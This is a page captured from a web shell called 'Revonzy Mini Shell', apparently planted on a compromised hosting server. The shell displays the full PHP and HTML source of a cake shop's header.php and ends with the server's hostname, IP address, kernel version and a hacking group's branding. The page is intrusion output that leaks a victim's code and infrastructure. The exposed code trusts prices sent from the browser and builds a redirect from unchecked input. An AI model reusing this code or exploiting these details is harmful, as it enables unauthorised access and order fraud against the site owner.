Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/cakedarbar.in/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/cakedarbar.in/header.php

<?php
	require_once("lib/functions.php");	
	$db = new login_function();
	
	$data   =   $db->get_all_contact_details();
	
$address    =   $data[0];
$phone      =   $data[1];
$email_id   =   $data[2];
	
	$cart_count = "";
	$current_session = session_id(); 
	$admin_email = 'contact@sattvicyug.com';
	
	if(!isset($_SESSION['visitor']))
	{
	    $todays_date = date("Y-m-d");
	    
	    $todays_counts = $db->get_todays_visitor_count($todays_date);
	    if($todays_counts=="")
	    {
	        $db->insert_visitor($todays_date);
	    }
	    else
	    {
	        $v_count = $todays_counts + 1;
	        
	        $db->update_visit_counter($todays_date,$v_count); 
	    }
	   $_SESSION['visitor'] = 1;
	}
	
	if(isset($_POST['search_btn']))
	{
		$srchword	=	$_POST['srchword'];
		$select_opt 	=	$_POST['select_opt'];
		header("Location:search.php?searchword=".$srchword."&option=".$select_opt);
	}
	
	/*if(isset($_GET['delete_id']))
	{
		$delete_id = $_GET['delete_id'];
		$db->delete_product_from_temp_cart($delete_id);
	}
	if(isset($_GET['delete_id']))
	{
		$delete_id = $_GET['delete_id'];
		$db->delete_product_from_temp_cart_for_display($delete_id);
	}*/
	
	if(isset($_GET['rmsgtm'])&& isset($_GET['actual_price']) && isset($_GET['selling_price']))
	{
		$item_id = $_GET['rmsgtm'];
		$actual_price = $_GET['actual_price'];
        $selling_price = $_GET['selling_price'];
		
		
		$item_exist_count = $db->get_counts_of_exist_item($item_id);
		
		if($item_exist_count==1)
		{
		    $db->delete_item_permanent($item_id);  
		}
		else
		{
		    $db->minus_item_quantity($item_id,$actual_price, $selling_price); 
		}
	}
	
	
    if (isset($_GET['c_id']) && isset($_GET['actual_price']) && isset($_GET['selling_price']) && isset($_GET['grams']) && isset($_GET['unit'])) {
        $c_id = $_GET['c_id'];
        $actual_price = $_GET['actual_price'];
        $selling_price = $_GET['selling_price'];
        $grams = $_GET['grams'];
        $unit = $_GET['unit'];
		$qty	=	1;
		$db->add_temp_cart($current_session, $c_id, $qty, $actual_price, $selling_price, $grams, $unit);		
	}	
	if(isset($_GET['i_c_id']) && isset($_GET['actual_price']) && isset($_GET['selling_price']) && isset($_GET['grams']) && isset($_GET['unit']))
	{
		$c_id			=	$_GET['i_c_id'];
		$actual_price	=	$_GET['actual_price'];
		$selling_price = $_GET['selling_price'];
        $grams = $_GET['grams'];
        $unit = $_GET['unit'];
		$qty	=	1;
		$db->add_temp_cart($current_session, $c_id, $qty, $actual_price, $selling_price, $grams, $unit);		
	}
?>
<!DOCTYPE html>
<html>
<head>
<title>Cake Darbar - Premium Cakes with Free Home Delivery in Solapur, Maharashtra</title>
<link rel="icon" type="image/x-icon" href="images/cake-darbar-ico.ico">
<!-- for-mobile-apps -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta property="og:title" content="Vide" />
<meta name="keywords" content="cake shop in Solapur, cakes in Solapur, online cake delivery Solapur, free home delivery cakes Solapur, custom cakes Solapur, birthday cakes Solapur, wedding cakes Solapur, Cake Darbar" />
<meta name="description" content="Order premium cakes online from Cake Darbar in Solapur, Maharashtra. We offer a wide range of delicious cakes for every occasion with free home delivery. Celebrate your special moments with our freshly baked cakes!" />
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
function hideURLbar(){ window.scrollTo(0,1); } </script>
<!-- //for-mobile-apps -->
<link href="css/bootstrap.css" rel='stylesheet' type='text/css' />
<!-- Custom Theme files -->
<link href="css/style.css" rel='stylesheet' type='text/css' />
<!-- js -->
<script src="js/jquery-1.11.1.min.js"></script>
<!-- //js -->
<!-- start-smoth-scrolling -->
<script type="text/javascript" src="js/move-top.js"></script>
<script type="text/javascript" src="js/easing.js"></script>
<script type="text/javascript">
	jQuery(document).ready(function($) {
		$(".scroll").click(function(event){		
			event.preventDefault();
			$('html,body').animate({scrollTop:$(this.hash).offset().top},1000);
		});
	});
</script>
<!-- start-smoth-scrolling -->
<link href="css/font-awesome.css" rel="stylesheet"> 
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=DM+Serif+Text:ital@0;1&display=swap" rel="stylesheet">
<style>
body
{
    font-family: "DM Serif Text", serif;
    font-weight: 300;
    font-style: normal;
}
    .dm-serif-text-regular {
  font-family: "DM Serif Text", serif;
  font-weight: 400;
  font-style: normal;
}

.dm-serif-text-regular-italic {
  font-family: "DM Serif Text", serif;
  font-weight: 400;
  font-style: italic;
}

</style>
<!--- start-rate---->
<script src="js/jstarbox.js"></script>
	<link rel="stylesheet" href="css/jstarbox.css" type="text/css" media="screen" charset="utf-8" />
		<script type="text/javascript">
			jQuery(function() {
			jQuery('.starbox').each(function() {
				var starbox = jQuery(this);
					starbox.starbox({
					average: starbox.attr('data-start-value'),
					changeable: starbox.hasClass('unchangeable') ? false : starbox.hasClass('clickonce') ? 'once' : true,
					ghosting: starbox.hasClass('ghosting'),
					autoUpdateAverage: starbox.hasClass('autoupdate'),
					buttons: starbox.hasClass('smooth') ? false : starbox.attr('data-button-count') || 5,
					stars: starbox.attr('data-star-count') || 5
					}).bind('starbox-value-changed', function(event, value) {
					if(starbox.hasClass('random')) {
					var val = Math.random();
					starbox.next().text(' '+val);
					return val;
					} 
				})
			});
		});
		</script>
<!---//End-rate---->
<style>
.order_time_notification
    {
        padding:5px;
        text-align:center;
        font-size:18px;
        width:95%;
        color:#eb0f85;
        margin:10px;
        animation: shake 0.5s;
        border:1px dashed #29de13;
  animation-iteration-count: infinite;
    }
    @keyframes shake {
  0% { transform: translate(1px, 1px) rotate(0deg); }
  60% { transform: translate(-1px, -2px) rotate(-1deg); }
 
}
.dropdown-menu.multi {
    min-width: 200px !important; 
    padding: 30px 30px;
}
.logo_img
{
    height:100px;
    margin:0px;
}
.header
{
    background-color:white; 
    width:100%; 
    border-top:2px solid #de15ad;
    margin-top:0px !important;
}
.slider_above_div
{
    height:202px;
    background-color:#666;
    border:1px solid #666;
}
.slider_below_div
{
	 height:320px;
}
.cartcount
{
    margin-top:-50px;
}
.content-top
{
    margin-bottom:50px;
}
.col-m
{
    height:320px
	border:1px solid;
    
}
.col-m {
    padding: 1em;
    border: 1px solid #B2B2B2; 
}
.img-responsive
{
    height:180px;
    width:1800px;
}
.offer-img img {
     margin: 0 auto; 
    
      width:600px;
}
.offer-img
{
   width:150px;
}
.pr_title
{
    font-size:16px !important;
    font-family: 'Noto Sans', sans-serif;
    font-weight:bold;
    color:#000000;
    overflow: hidden;
    width:100%;
    height:24px;
}
.title_div
{
     min-height:70px;
     padding-top:7px;
     line-height:30px;
}
#wrapper
{
    width:100%;
    min-height:400px;
    padding:0px;
}
#tblcrtac
{
    cellspacing="0"
    cellpadding="0"
    border="0" 
    width="400"
    height="54" 
    align="center"
}
.t1
{
	text-align:center;
	font-size:20px;
	font-style:italic; 
	font-weight:bold;
	color:white;
}
.t2
{
	text-align:center;
	font-size:22px;
	font-style:italic;
	color:white;
	line-height:30px;
}
.t3
{
	float:right;
	font-size:20px;
	font-style:italic; 
	font-weight:bold;
	color:white;
}
.item
{
	height:200px;
	text-align:center;
	padding:10px;
	
	
}
.cart_t
{
	width:98%;
}
.cart_t tr td
{
	font-size:16px !important; 
}
h3
{
    font-weight:bold; 
   // color:green !important;
}
.carousel-inner
{
    height:350px;
   
}
.item {
    height: 200px;
    text-align: center;
    padding: 0px !important; 
}
body
{
    margin:0px !important;
}
.we-assure-section {
    padding: 40px 0;
    background: #699f42;
    text-align: center;
}
.container {
    width: 100%;
    padding-right: 15px;
    padding-left: 15px;
    margin-right: auto;
    margin-left: auto;
}
.we-assure-section h1 {
    font-size: 36px;
    color: #FFF;
    margin-bottom: 40px;
    font-weight: 600;
}
ul, li, ol {
    list-style: none;
    margin: 0px;
    padding: 0px;
}
.we-assure-section ul li {
    width: 16.66666666666667%;
    float: left;
    font-size: 16px;
    color: #FFF;
}
ul, li, ol {
    list-style: none;
    margin: 0px;
    padding: 0px;
}
user agent stylesheet
li {
    text-align: -webkit-match-parent;
}
user agent stylesheet
ul {
    list-style-type: disc;
}
.we-assure-section {
    padding: 40px 0;
    background: #699f42;
    text-align: center;
	width:100%;
}
.whats-new-section
{
	width:100%;
	background: #F6F1FF !important;
	min-height:400px;
	margin-top:30px;
}
.whats-new-image
{
	height:300px; 
	margin:20px;
	margin-right:100px;
}
.video-section
{
	width:100%;
	background-repeat: no-repeat;
	min-height:300px;
	margin-top:30px;
}
.video_message
{
 color:white !important;
 font-size:28px; 
 text-align:center;
 font-weight:bold;
 width:80% !important;
 margin:auto !important;
 }
 .video_link
 {
	 width:80%;
	 height:300px;
 }
 .img-thumbnail
 {
	  width:280px;
	  height:200px;
	  margin:20px;
 }
 .whats_news_pnl
 {
     width:49%; display:inline-table;
 }
 .heading_data
	{
		font-size:16px;
		padding:10px;
		font-weight:bold;
		background:#d6f2d2;
		font-family:Times New Roman;
	}
	.navbar-default .navbar-nav > li > a
	{
	    color: #252222;
        font-weight: bold;
	}
	.product_data_displ
	{
	    border:1px solid white !important; background-color:#FFFFFF; text-align:left; box-shadow:0px 0px 10px 0px #DFDFDF; border-radius:15px;
	}
	.price_tags
    {
        padding:3px;
        font-size:14px;
        width:45% !important;
        position:static;
        margin-top:4px;
    }
@media only screen and (max-width: 600px)
{
    .price_tags
    {
        padding:3px;
        font-size:14px;
        width:45% !important;
        position:static;
        margin-top:4px;
    }
    .product_data_displ
    {
        box-shadow:0px 0px 2px 1px #DFDFDF;
    }
    .logo_img
    {
      width:30%;
      height:auto;
    }
    .header
    {
        position:static; 
        background-color:white; 
        width:100%; 
        margin-top:0px !important; 
        z-index:100;
    } 
   
    .cartcount
    {
        margin-top:-60px;
    }

    .slider_above_div
    {
        height:138px !important;
    }
	.slider_below_div
    {
        height:100px;
    }
    .col-m
    {
        height:440px;
        padding:10px !important;
    }
    .img-responsive
    {
        height:80px;
    }
    .pr_title
    {
        font-size:13px !important;
        font-family: 'Noto Sans', sans-serif;
        font-weight:bold;
    }
    .mid-2 p
    {
        font-size:13px !important;
    }
    
    .cart_t
    {
        width:100%;
        margin:0px !important;
    }
    .heading_data
	{
		font-size:10px !important;
		padding:5px;
		font-weight:bold;
		background:#d6f2d2;
		font-family:Times New Roman;
	}
	.cart_t tr td
	{
	   	font-size:10px !important; 
	}
	#wrapper
	{
	    width:100%;
	    min-height:400px;
	    padding:0px;
	}
	.t1
	{
		text-align:center;
		font-size:12px;
		font-style:italic; 
		font-weight:bold;
		color:white;
	}
	.t2
	{
		text-align:center;
		font-size:14px;
		font-style:italic;
		color:white;
		line-height:30px;
	}
	.t3
	{
		float:right;
		font-size:12px;
		font-style:italic; 
		font-weight:bold;
		color:white;
	}
	.item
	{
		height:height;
		text-align:center;
		padding:5px;
	}
	.carousel-inner
    {
        height:300px !important;
    }
	.whats-new-image
	{
		height:200px; 
		margin:10px;
	}
	.whats-new-section
	{
		width:100%;
		background: #F6F1FF !important;
		min-height:200px;
		margin-top:30px;
		
	}
	.video_message
	{
	 color:white !important;
	 text-align:center;
	 font-weight:bold;
	 padding-top:0px;
	  width:80% !important;
	 }
	 .video_link
	 {
		 width:95%;
		 height:130px;
	 }
	  .img-thumbnail
	 {
		  
		  width:200px;
		  height:100px;
		  margin:20px;
	 }
	 .whats_news_pnl
     {
         width:94% !important;
     }
}
</style>
<style>
.search_btn_balaji {
	box-shadow:inset 0px 1px 0px 0px #fbafe3;
	background:linear-gradient(to bottom, #ff5bb0 5%, #ef027d 100%);
	background-color:#ff5bb0;
	border-radius:6px;
	border:1px solid #ee1eb5;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:15px;
	font-weight:bold;
	padding:9px 24px;
	text-decoration:none;
	text-shadow:0px 1px 0px #c70067;
}
.search_btn_balaji:hover {
	background:linear-gradient(to bottom, #ef027d 5%, #ff5bb0 100%);
	background-color:#ef027d;
}
.search_btn_balaji:active {
	position:relative;
	top:1px;
}

.add_to_cart_btn
{
    -webkit-border-radius: 28;-moz-border-radius: 28;border-radius: 28px;font-family: Arial;color: #ffffff;font-size: 14px !important;background: #5E9400;
    padding:2px 10px 0px 10px !important;text-decoration: none;font-weight:bold; width:auto !important;
}
.add_to_cart_btn:hover
{
    color:#FFFFFF !important;
}
.plus_button{
    background-color: #5E9400;
    color: white;
    margin: 2px;
    border-radius:5px;
    width:15px;
    padding:0px 10px 0px 10px;
    font-size:19px;
    font-weight:bold;
    display:inline-table;
}
.minus_button {
    background-color: #5E9400;
    color: white;
    border-radius:5px;
    display:inline-table;
    width:20px !important;
    margin: 2px;
    padding:0px 10px 0px 10px;
    text-align:center;
    font-size:19px;
    font-weight:bold;
}
h2 , h2:hover
{
    text-decoration:none !important;
}
.feedback_item
{
    width:80%;
    margin:auto;
}
.main_carousl
{
    height:550px;
}
.prodcts
{
    height:205px !important;
    width:auto !important;
}
.vdo_section_tt
{
	width:48%; float:left;margin-top:60px;
	text-align:center !important;
}
.vdo_disply_vdo_tt
{
	width:48%; display:inline-table;
	text-align:center;
}
.video_message
{
    color:#000 !important;
}
.video-section
{
    background-repeat:no-repeat;
}
.cerifyed_by li
{
    margin:5px;
}
.certificate_img
{
    margin:0px !important;
}
.pr_title
{
    font-size:17px !important;
    text-transform:capitalize;
}
.block_top
{
    font-weight:bold; color:#000; text-align:center; width:48%;
}

.btn_new {
  -webkit-border-radius: 28;
  -moz-border-radius: 28;
  border-radius: 28px;
  font-family: Arial;
  color: #ffffff;
  font-size: 20px;
  background: #db0d58;
  padding: 10px 20px 10px 20px;
  text-decoration: none;
  font-weight:bold;
}

.btn_new:hover {
  background: #e617af;
  text-decoration: none;
  color:#FFF;
}
.parcel_person
{
    height:300px;
}
.slide_it_img
{
    height:550px !important;
    width:100% !important;
}
.m-wthree
{
    padding:8px;
}
.img_div_disp
{
    height:200px !important;
}
.m-wthree
    {
        margin-top:5px;
    }
    .bottom_slider_img
{
    height:auto !important;
    width:100% !important;
}
.bottom_slider_img_div
{
    height:auto !important;
    width:50% !important;
}
@media only screen and (max-width: 600px) {
.nav-top
{
    margin-bottom:0px !important;
}
    .m-wthree
    {
        margin-top:5px !important;
    }
    .container
    {
        padding:2px !important;
    }
.add_to_cart_btn
    {
        width:100% !important;
    }
.img_div_disp
{
    height:150px !important;
}   
.m-wthree
{
    padding:7px;
    height:auto !important;
    height:450px !important;
}
.prodcts
{
    height:150px !important;
}
.slide_it_img
{
    height:200px !important;
    width:100% !important;
}
.bottom_slider_img
{
    height:auto !important;
    width:100% !important;
}
.bottom_slider_img_div
{
    height:auto !important;
    width:100% !important;
}
  .img_tt1 {
    width:80%;
    display:inline-table;
    margin-top:15px;
  }
  .img_tt2_txt
  {
      font-size:14px !important;
      width:50% !important;
      text-align:center;
  }
    .t1 , .t2 , .t3
    {
        font-size:15px !important;
        line-height:18px;
    }
    .main_carousl
    {
        height:auto !important;
    }
    .vdo_section_tt
    {
    	width:100%; margin-top:15px;
    }
    .vdo_disply_vdo_tt
    {
    	width:90%;
    	text-align:center;
    	margin-top:15px;
    }
    .video_link
    {
        height:250px;
        margin-top:10px;
        margin-bottom:10px;
    }
    .video-section
    {
        background-size:100% 100% !important;
    }
    
    .cerifyed_by li
    {
       width:47% !important;
    }
    .whats-new-image
    {
        height:120px;
    }
    .parcel_person
    {
        height:200px;
    }
    .block_top
    {
        font-weight:bold; color:#000; text-align:center; width:70%; font-size:10px;
    }
    .soc_icon_translator
    {
        width:100% !important;
        padding-left:15px;
        border-bottom:1px solid #EFEFEF;
    }
    .offer_line_contnr
    {
        width:100% !important;
        margin-top:8px;
    }
    .social-top
    {
        padding-top:4px;
    }
}
.header_top_contnr
{
    padding:5px;
    width:100%;
    background-color:#FFFFFF;
}
.icon i
{
    font-size:20px;
    line-height:35px;
}
.offer_line_contnr
{
    font-size:16px;
    font-weight:bold;
    padding-top:2px;
    width:50%;
    display:inline-table;
}
.delivery_logo
{
    height:25px;
    margin-right:10px;
    margin-bottom:5px;
}
.soc_icon_translator
{
    float:right; display:inline-table; margin-right:10px;
}
</style>
</head>
<body>


<?php
 $get_f_link = $db->get_facebook_link();
 $get_t_link = $db->get_twitter_link();
 $get_l_link = $db->get_linked_link();
 $get_g_link = $db->get_google_link(); 
 $get_y_link = $db->get_youtube_link();
 $get_te_link = $db->get_telegram_link();
?>
<!--<div class="header_top_contnr">-->
<!--    <div class="soc_icon_translator">-->
        
<!--    <div id="google_translate_element" style="float:right; margin-right:10px;"></div>-->

<!--    <script type="text/javascript">-->
<!--        function googleTranslateElementInit() {-->
<!--            new google.translate.TranslateElement(-->
<!--                {pageLanguage: 'en',-->
<!--                    includedLanguages: 'hi,mr'-->
<!--                },-->
<!--                'google_translate_element'-->
<!--            );-->
<!--        }-->
<!--    </script>-->

<!--    <script type="text/javascript" -->
<!--            src=-->
<!--"https://translate.google.com/translate_a/element.js?-->
<!--cb=googleTranslateElementInit">-->
<!--    </script>-->
        
<!--    <ul class="social-top" style="float:left;">-->
<!--		<li><a href="<?php echo $get_f_link; ?>" class="icon facebook"><i class="fa fa-facebook" aria-hidden="true"></i><span></span></a></li>-->
<!--		<li><a href="<?php echo $get_f_link; ?>" class="icon twitter"><i class="fa fa-twitter" aria-hidden="true"></i><span></span></a></li>-->
<!--		<li><a href="<?php echo $get_y_link; ?>" class="icon pinterest"><i class="fa fa-youtube" aria-hidden="true"></i><span></span></a></li>-->
<!--		<li><a href="<?php echo $get_l_link; ?>" class="icon dribbble"><i class="fa fa-linkedin" aria-hidden="true"></i><span></span></a></li>-->
<!--	</ul>-->
	
	
	
<!--	</div>-->
<!--	<div class="offer_line_contnr">-->
<!--         <marquee direction="left" style="width:100%; font-weight:bold; font-size:18px;">-->
<!--         <img src="images/car-delivery.jpg" class="delivery_logo" />Free Shipping over ₹200/--->
<!--         <img src="images/car-delivery.jpg" class="delivery_logo" />Free Shipping over ₹200/--->
<!--         </marquee>-->
<!--    </div>-->
<!--</div>-->

<div class="header main_header_container" style="height:auto !important;">
<div class="container main_header_container" style="padding:0px !important; margin:0px !important; height:auto !important;">
<div class="logo">
	<h1 ><a href="index.php"><img src="images/cake-darbar-logo.png" class="logo_img" /></a></h1>
</div>

<!--<div class="header-ri">
	<ul class="social-top">
		<li><a href="<?php echo $get_f_link; ?>" class="icon facebook"><i class="fa fa-facebook" aria-hidden="true"></i><span></span></a></li>
		<li><a href="<?php echo $get_f_link; ?>" class="icon twitter"><i class="fa fa-twitter" aria-hidden="true"></i><span></span></a></li>
		<li><a href="<?php echo $get_y_link; ?>" class="icon pinterest"><i class="fa fa-youtube" aria-hidden="true"></i><span></span></a></li>
		<li><a href="<?php echo $get_l_link; ?>" class="icon dribbble"><i class="fa fa-linkedin" aria-hidden="true"></i><span></span></a></li>
	</ul>	
</div>-->

<div class="nav-top" style="background-color:#fcf4fc; width:100%; border:1px solid #e7a1e1; margin-bottom:0px !important;">
<nav class="navbar navbar-default">

<div class="navbar-header nav_2">
<button type="button" class="navbar-toggle collapsed navbar-toggle1" data-toggle="collapse" data-target="#bs-megadropdown-tabs">
	<span class="sr-only">Toggle navigation</span>
	<span class="icon-bar"></span>
	<span class="icon-bar"></span>
	<span class="icon-bar"></span>
</button>

</div> 
<div class="collapse navbar-collapse" id="bs-megadropdown-tabs">
<ul class="nav navbar-nav">
<li class=""><a href="index.php" class="hyper "><span>Home</span></a></li>	

<?php
/*
$report_details = $db->get_all_main_category_of_top_panel();
		
if(!empty($report_details))
{
	$counter =0;
	foreach($report_details as $record)
	{
		$id				=	$report_details[$counter][0];
		$menubar		=	$report_details[$counter][1];
		$category		=	$report_details[$counter][2];
		
		$sub_cat_data = array();
		$sub_cat_data = $db->get_all_subcategory_data($category);
		
		if(!empty($sub_cat_data))
		{
?>
<li class="dropdown">
<a href="/search.php?searchword=<?php echo $category; ?>" class="dropdown-toggle  hyper" data-toggle="dropdown" ><span><?php echo $category; ?><b class="caret"></b></span></a>
<ul class="dropdown-menu multi">
<div class="row">
<div class="col-sm-12">
	<ul class="multi-column-dropdown">
	<?php
	foreach($sub_cat_data as $record)
	{
	?>
		<li><a href="search.php?searchword=<?php echo $record; ?>"><i class="fa fa-angle-right" aria-hidden="true"></i><?php echo $record; ?></a></li>
	<?php		
	}
	?>
	</ul>
</div>
</div>	
</ul>
</li>
<?php
			}	
			else
			{
?>
<li>
<a href="search.php?searchword=<?php echo $category; ?>" class="hyper"><span><?php echo $category; ?></span></a>
</li>
<?php
	}
?>
<?php
	$counter++;
		}
	}*/
?>
<li><a href="contact-us.php" class="hyper"><span>Contact Us</span></a></li>
<li><a href="cart.php" class="hyper"><span>My Cart Items</span></a></li>
</ul>
</div>
</nav>

<?php 
	if(isset($_SESSION['login_email'])){
	?>
<a href="changepwd.php">Change Password</a>&nbsp &nbsp &nbsp
<a href="user-login.php?logout">Logout</a>&nbsp &nbsp &nbsp
<a href="my-orders.php?logout">My Orders </a>

<p class="m-0"> User ID:<?php echo $_SESSION['login_email']; ?> </p>
<?php
}
?>
</div>

</div>	
	
</div>
	

<!---->
<!--<div data-vide-bg="video/video" >
<div class="container">
<div class="banner-info">
<h3>It is a long established fact that a reader will be distracted by 
the readable </h3>	
<div class="search-form">
<form action="#" method="post">
<input type="text" placeholder="Search..." name="Search...">
<input type="submit" value=" " >
</form>
</div>		
</div>	
</div>
</div>-->





<script>window.jQuery || document.write('<script src="js/jquery-1.11.1.min.js"><\/script>')</script>
<script src="js/jquery.vide.min.js"></script>
<script src="js/jquery.vide.min.js"></script>
<script type="text/javascript" src="/js/zoom_unc_min_22.js.download"></script>
	
	<div id="carts_section">
			
	</div>	
	
<div class="menu_slider" style="margin-top:1px;">

<script type="text/javascript">
$( document ).ready(function() {
    
    $("#close_cart_section").click(function(){
	    $("#cart_closed_panel").hide('slow');
	});
	
	//Working of Plus button
    $(".plus_button").click(function(){
		
		var current_minus_qnty = $(this).parent().find(".field").first().val();
		var id_of_product =  $(this).parent().find(".val_id").first().val();
		var val_price_of_product =  $(this).parent().find(".val_price").first().val();
		var url_val = "add-cart-background.php";
	
	$.post("add-cart-background.php",
    {
        c_id: id_of_product,
        actual_price: val_price_of_product,
        qnty:current_minus_qnty
    },
    function(data, status){
		
        if(data=="success")
		{
			//$("#carts_section").load("added_carts.php");
			$(".inblock").load("cartscount.php");
			window.location="cart.php";
			//alert("Cart added successfully");
			//$("#carts_section").load("added_carts.php");
		}
    });

		return false;
	});
	
	//Working of Minus button
    $(".minus_button").click(function(){
		var current_minus_qnty = $(this).parent().find(".field").first().val();
		var id_of_product =  $(this).parent().find(".val_id").first().val();
		var val_price_of_product =  $(this).parent().find(".val_price").first().val();
		var url_val = "minus-cart-background.php";
	
	$.post("minus-cart-background.php",
    {
        c_id: id_of_product,
        actual_price: val_price_of_product,
        qnty:current_minus_qnty
    },
    function(data, status){
        if(data=="success")
		{
			//$("#carts_section").load("added_carts.php");
			$("#cart_block").load("cart.php");
			$("#cart_block").load("cartscount.php");
			//window.location="cart.php";
			//alert("Cart removed successfully");
		}
    });

		return false;
	});
	
});
</script>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4